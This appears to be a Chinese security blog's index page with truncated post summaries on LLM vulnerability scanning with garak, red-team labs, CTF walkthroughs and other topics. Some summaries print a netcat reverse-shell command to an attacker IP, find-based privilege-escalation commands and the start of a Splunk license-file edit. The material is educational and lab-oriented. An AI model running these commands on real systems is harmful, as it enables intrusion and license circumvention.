土豆分米猪

摘要： 背景 按照官方文档对接Langfuse和Langraph/Langchain时出现SSL报错，无法继续。 官方文档： Cookbook: LangGraph Integration Langfuse 原因分析 报错信息如下： 定位到源码： .../.venv/lib/python3.12/site- 阅读全文

摘要： 什么是 garak garak是英伟达开源的大语言模型的漏洞扫描工具，支持对大模型进行幻觉、数据泄露、提示词注入、误解、恶意内容生成、越狱等脆弱性进行扫描。类似于传统渗透测试中的nmap和msf等工具。 安装 garak 官方代码仓库：https://github.com/NVIDIA/garak 阅读全文

摘要： Windows环境无法通过互联网直接下载Hugging Face的模型文件，通过Linux环境下载后需要复制到Windows环境，可按照如下步骤进行操作。 模型存储路径 Windows环境Hugging Face模型存储路径： C:\Users\<Username>\.cache\huggingfa 阅读全文

摘要： Web 安全入门 前言 网络安全是一个系统化工程，Web 安全只是其很小的一个部分，因为 Web 应用是目前最常见的软件服务形式，所以 Web 往往是黑客们青睐的攻击点。 我们可以将渗透测试简单地理解为对 Web 应用开展的安全性测试，所以理解 Web 应用的工作原理是开展一切渗透测试工作的前提，涉 阅读全文

摘要： ATT&CK红队评估一 镜像下载 镜像下载地址 网络配置 网络拓扑图 VMware 网络配置 使用 VMware 的『虚拟网络编辑器』添加两个虚拟网络。 虚拟网络名称 网段 DHCP VMnet3 192.168.72.0/24 是 VMnet4 192.168.52.0/24 是 虚拟机网络配置 阅读全文

摘要： 1 序列化与反序列化 1.1 概念 序列化： 将数据结构或对象转换成二进制串的过程 反序列化：将在序列化过程中所生成的二进制串转换成数据结构或者对象的过程 1.2 使用场景 当你想把的内存中的对象状态保存到一个文件中或者数据库中时候。 当你想用套接字在网络上传送对象的时候。 当你想通过 RMI 传输 阅读全文

摘要： 0x00 natas0 http://natas0.natas.labs.overthewire.org/ 直接 F12 查看源码，找到密码。 0x01 natas1 http://natas1.natas.labs.overthewire.org/ 禁用了右键，直接 F12 查看源码，找到密码。 阅读全文

摘要： 1 WebShell 到 bash/sh 1.1 反弹 Shell 攻击机器 $ nc -lvvp 4444 # 开启 4444 端口，等待目标机器回连 受害机器 $ nc -nv x.x.x.x 4444 -e /bin/bash # x.x.x.x 是攻击机器的IP，将Shell反弹 2 不同用 阅读全文

摘要： 1 find 命令提权 1.1 方法一 find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \;-quit 1.2 方法二 touch getshell find / -type f -name getshell -exec " 阅读全文

摘要： 关闭splunk： sudo splunk stop cd /opt/splunk/lib/python2.7/site-packages/splunk/appserver/mrsparkle/controllers sudo vi licensing.py 找到： if action == 'ad 阅读全文